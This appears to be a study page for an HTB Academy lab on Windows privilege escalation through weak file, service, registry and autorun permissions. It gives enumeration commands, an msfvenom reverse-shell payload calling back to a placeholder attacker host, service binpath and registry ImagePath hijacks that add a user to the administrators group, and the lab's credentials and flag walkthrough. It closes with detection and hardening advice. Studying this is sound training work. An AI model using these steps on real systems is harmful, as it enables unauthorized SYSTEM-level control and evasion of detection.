πWeak Permissions
π― Overview
Weak permissions are common in third-party software and custom applications. Services typically run with SYSTEM privileges, making permission flaws a direct path to complete system control. Key vectors include file system ACLs, service permissions, unquoted paths, registry ACLs, and autorun binaries.
π§ Permissive File System ACLs
Service Binary Discovery
# Use SharpUp to identify vulnerable service binaries
.\SharpUp.exe audit
# Example output:
Name : SecurityService
DisplayName : PC Security Management Service
PathName : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
State : Stopped
StartMode : AutoPermission Verification
# Check file permissions with icacls
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
# Vulnerable example:
C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
# (F) = Full Control for Users and EveryoneBinary Replacement Attack
# Backup original binary
copy "C:\Program Files (x86)\PCProtect\SecurityService.exe" SecurityService.exe.bak
# Generate malicious binary
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACK_IP LPORT=4444 -f exe > malicious.exe
# Replace service binary
copy /Y malicious.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
# Start service for SYSTEM shell
sc start SecurityServiceπ οΈ Weak Service Permissions
Service Permission Enumeration
# Check service permissions with AccessChk
accesschk.exe /accepteula -quvcw WindscribeService
# Vulnerable output:
WindscribeService
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS # β Full control for all usersBinary Path Modification Attack
# Check current local admin group
net localgroup administrators
# Modify service binary path
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
# Stop and start service to execute command
sc stop WindscribeService
sc start WindscribeService
# Verify privilege escalation
net localgroup administrators
# htb-student should now be listedService Cleanup
# Restore original binary path
sc config WindscribeService binpath="C:\Program Files (x86)\Windscribe\WindscribeService.exe"
# Start service normally
sc start WindscribeServiceπ Unquoted Service Path
Path Discovery
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Example vulnerable path:
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exeExecution Order Analysis
# Windows searches for executables in this order:
C:\Program.exe
C:\Program Files (x86)\System.exe
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
# Limitation: Requires admin privileges to write to root or Program Filesπ Permissive Registry ACLs
Registry Service Key Enumeration
# Check for weak registry ACLs
accesschk.exe /accepteula "htb-student" -kvuqsw hklm\System\CurrentControlSet\services
# Vulnerable example:
RW HKLM\System\CurrentControlSet\services\ModelManagerService
KEY_ALL_ACCESSRegistry Modification Attack
# Modify service ImagePath in registry
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\htb-student\malicious.exe"
# Restart service or system for executionπ Modifiable Registry Autorun Binary
Autorun Program Discovery
# Check startup programs
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
# Example autorun locations:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (System-wide)
- HKU\S-1-5-21-...\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (User-specific)Autorun Exploitation
# Check permissions on autorun binary
icacls "C:\Program Files (x86)\Windscribe\Windscribe.exe"
# If writable, replace with malicious binary
# Executes when target user logs inπ― HTB Academy Lab Solution
Lab Environment
Credentials:
htb-student:HTB_@cademy_stdnt!Access Method: RDP
Objective: Escalate privileges using weak permissions
Flag Location:
C:\Users\Administrator\Desktop\WeakPerms\flag.txt
Complete Walkthrough
# 1. RDP connect and enumerate services
.\SharpUp.exe audit
# 2. Check for weak service permissions
accesschk.exe /accepteula -quvcw [SERVICE_NAME]
# 3. Identify exploitable service (e.g., WindscribeService)
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
# 4. Execute privilege escalation
sc stop WindscribeService
sc start WindscribeService
# 5. Verify admin access
net localgroup administrators
# 6. Access flag as administrator
type C:\Users\Administrator\Desktop\WeakPerms\flag.txt
# 7. Clean up (optional)
sc config WindscribeService binpath="[ORIGINAL_PATH]"
net localgroup administrators htb-student /deleteπ Alternative Techniques
PowerShell Service Enumeration
# Get services with weak permissions
Get-WmiObject win32_service | Select-Object Name, DisplayName, PathName, StartMode | Where-Object {$_.StartMode -eq "Auto"}Manual Permission Checks
# Check file permissions
icacls "C:\Program Files\Application\service.exe"
# Check service permissions
sc sdshow [SERVICE_NAME]
# Check registry permissions
reg query HKLM\System\CurrentControlSet\Services\[SERVICE] /sβ οΈ Detection & Defense
Detection Indicators
# Monitor for:
- Service configuration changes (Event ID 7040)
- Unusual binary modifications in Program Files
- Registry modifications in service keys
- Privilege escalation eventsDefensive Measures
# Security hardening:
- Implement least privilege for service accounts
- Regular permission audits on critical binaries
- Monitor service configuration changes
- Restrict write access to system directories
- Use Application Control policiesπ‘ Key Takeaways
Third-party software commonly has weak permissions
Service binaries are high-value targets (SYSTEM privileges)
Multiple attack vectors - files, services, registry, autorun
AccessChk and SharpUp are essential enumeration tools
Cleanup important to avoid detection and maintain operations
Weak permissions exploitation leverages misconfigurations in file systems, services, and registry to achieve privilege escalation.
Last updated